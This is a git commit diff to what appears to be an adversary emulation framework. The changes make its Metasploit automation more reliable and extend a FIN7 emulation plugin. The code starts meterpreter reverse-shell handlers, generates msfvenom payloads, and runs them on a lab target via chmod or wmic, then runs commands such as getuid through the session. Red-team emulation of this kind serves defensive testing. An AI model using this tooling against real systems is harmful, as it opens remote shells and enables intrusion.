More reliable metasploit

Thorsten Sick 3 years ago
parent db2cce262f
commit 5eeaa02b4d

@ -91,6 +91,7 @@ class Experiment():
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Initial start of caldera client: {tname} {CommandlineColors.ENDC}", 1)
time.sleep(20) # Wait for all the clients to contact the caldera server
# TODO: Smarter wait
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Contacting caldera agents on all targets ....{CommandlineColors.ENDC}", 1)
# Wait until all targets are registered as Caldera targets

@ -43,19 +43,25 @@ class Metasploit():
kwargs["server"] = self.attacker.get_ip()
time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client.
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler'):
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler', lhost=None):
""" Start a metasploit handler and wait for external payload to connect
@param payload: The payload being used in the implant
@param exploit: Normally the generic handler. Overwrite it if you feel lucky
@param lhost: the ip of the attack host. Use this to use the attacker ip as seen from the controller.
@:returns: res, which contains "job_id" and "uuid"
exploit = self.get_client().modules.use('exploit', exploit)
exp = self.get_client().modules.use('exploit', exploit)
# print(exploit.description)
# print(exploit.missing_required)
payload = self.get_client().modules.use('payload', payload)
pl = self.get_client().modules.use('payload', payload)
# print(payload.description)
# print(payload.missing_required)
payload["LHOST"] = self.attacker.get_ip()
res = exploit.execute(payload=payload)
if lhost is None:
lhost = self.attacker.get_ip()
pl["LHOST"] = lhost
print(f"Creating stub for external payload Exploit: {exploit} Payload: {payload}, lhost: {lhost}")
res = exp.execute(payload=pl)
return res
@ -104,7 +110,7 @@ class Metasploit():
while self.get_client().sessions.list == {}:
print(f"Waiting to get any session {retries}")
print(f"Metasploit waiting to get any session {retries}")
retries -= 1
if retries <= 0:
raise MetasploitError("Can not find any session")
@ -276,6 +282,7 @@ class MSFVenom():
cmd += f" -e {encoder}"
if iterations is not None:
cmd += f" -i {iterations}"
cmd += " SessionRetryWait=1 "
# Detecting all the mistakes that already have been made. To be continued
# Check if encoder supports the architecture
@ -294,6 +301,7 @@ class MSFVenom():
# Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here
def generate_and_deploy(self, **kwargs):
@ -327,8 +335,7 @@ class MSFVenom():
cmd = ""
cmd += f"chmod +x {payload_name}; ./{payload_name}"
if == "windows":
cmd = f'{payload_name}'
cmd = f'wmic process call create "%homepath%\\{payload_name}",""'
if self.attack_logger:

@ -1,6 +1,7 @@
#!/usr/bin/env python3
# Adversary emulation for FIN7
import socket
from plugins.base.attack import AttackPlugin
from app.interface_sfx import CommandlineColors
@ -27,13 +28,17 @@ class FIN7Plugin(AttackPlugin):
self.plugin_path = __file__
self.metasploit_1 = None
def get_metasploit_1(self):
""" Returns a metasploit with a session for the first targeted machine """
def get_metasploit_1(self, payload):
""" Returns a metasploit with a session for the first targeted machine
@param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https"
if self.metasploit_1:
return self.metasploit_1
self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
return self.metasploit_1
@ -179,7 +184,6 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m
dl_uri = ""
architecture = "x64"
target_platform = "windows"
@ -271,8 +275,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# TODO: Babymetal payload is a dll. Currently we are using a simplification here (exe). Implement the proper steps.
payload = self.payload_type_1
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
@ -288,9 +294,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# TODO: invoke-Shellcode.ps1 loads shellcode into powershell.exe memory (Allocate memory, copy shellcode, start thread) (received from C2 server)
# metasploit1 = self.get_metasploit_1()
# print("Got session, calling command")
# print(metasploit.meterpreter_execute_on(["getuid"], hotelmanager))
metasploit1 = self.get_metasploit_1(payload)
print("Got session, calling command")
print(metasploit1.meterpreter_execute_on(["getuid"], hotelmanager))
print("Should have called session now")
f"{CommandlineColors.OKGREEN}End Step 4: Staging Interactive Toolkit{CommandlineColors.ENDC}", 1)
@ -303,8 +310,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
hotelmanager = self.get_target_by_name("hotelmanager")
payload = self.payload_type_1
# This is meterpreter !
metasploit = self.get_metasploit_1()
metasploit = self.get_metasploit_1(payload)
# powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?)
self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute ps -ax through meterpreter{CommandlineColors.ENDC}", 1)
@ -730,11 +739,11 @@ NOT IMPLEMENTED YET
filename = "AccountingIQ.exe"
dl_uri = ""
logid = self.attack_logger.start_build(
logid = self.attack_logger.start_build(filename=filename,
comment="This is a simulated credit card tool to target. The final flag is in here.")
comment="This is a simulated credit card tool to target. The final flag is in here."
# simulated credit card tool as target
self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_10") # MSFVenom needs to be installed
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm {filename}")
